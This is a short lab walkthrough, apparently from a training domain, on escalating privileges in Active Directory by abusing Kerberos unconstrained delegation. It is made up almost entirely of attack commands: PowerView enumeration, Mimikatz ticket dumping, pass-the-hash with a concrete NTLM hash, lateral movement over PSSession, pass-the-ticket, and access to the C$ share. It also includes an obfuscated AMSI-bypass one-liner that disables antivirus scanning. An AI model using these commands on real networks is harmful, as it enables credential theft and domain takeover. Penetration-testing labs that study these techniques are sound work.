Privesc kerberos

Discover domain computers which have unconstrained delegation enabled using powerview :

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained

Using active directory module :

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetComputer –Unconstrained

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-ADUser -Filter {trustedfordelegation -eq $true}

Run the following command on it to check if anyDA token is available:

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::tickets”‘

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:administrator /domain:security.local /ntlm:638edc584b4d0a93fe3701b66d2f525b /run:powershell.exe”‘

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> powershell.exe -executionpolicy bypass

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> . .\powerview.ps1

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Find-LocalAdminAccess

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC.security.local

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Enter-PSSession -Session $sess

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> sET-ItEM ( ‘v’+’aR’ + ‘IA’ + ‘blE:1q2’ + ‘uZx’  ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( GeT-VariaBle ( “1Q2U” +”zX” ) -VaL ).”A’ss’Emb1y”.”GET’TY’Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f’Util’,’A’,’Amsi’,’.Management.’,’utomation.’,’s’,’System’ )).”g’etf’iElD”( (“{0}{2}{1}” -f’amsi’,’d’,’InitFaile’ ),( “{2}{4}{0}{1}{3} -f ‘Stat’,’i’,’NonPubli’,’c’,’c,’ )).”sE’T’ VaLUE”(${n’ULl},${t’RuE} )

mimikatz # privilege::debug

mimikatz # sekurlsa::tickets /export

PS C:\Users\victim3\Downloads\tool\tool\mimikatz_trunk (1)> cd .\x64\

PS C:\Users\victim3\Downloads\tool\tool\mimikatz_trunk (1)\x64> dir

PS C:\Users\victim3\Downloads\tool\tool\PowerTools-master\PowerTools-master\PowerView> Invoke-UserHunter -ComputerName WIN-2RUMVG5JPOC -UserName administrator -Delay 5 –Verbose

PS C:\Users\victim3\Downloads\tool\tool> cd .\NetCease\

PS C:\Users\victim3\Downloads\tool\tool\NetCease> .\NetCease.ps1

PS C:\Users\victim3\Downloads\tool\tool\NetCease> ls \\WIN-2RUMVG5JPOC.security.local\c$

mimikatz # sekurlsa::kerberos

Remove all the tickets :

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> rm -force *.kirbi

Export new tickets :

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> invoke-mimikatz -command ‘”sekurlsa::tickets /exports”‘

We get the list of all the ticket :

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> ls | select name

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

PS C:\Users\victim3\Downloads\tool\tool\NetCease> Invoke-mimikatz -command ‘”kerberos::ptt [0;39f28c6]-2-0-60a1000-administrator@WIN-2RUMVG5JPOC.security.local.kirbi“‘

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> ls \\WIN-2RUMVG5JPOC.security.local\c$

[WIN-2RUMVG5JPOC.security.local]: PS C:\Users\Administrator\Documents> exit

@Saksham Dixit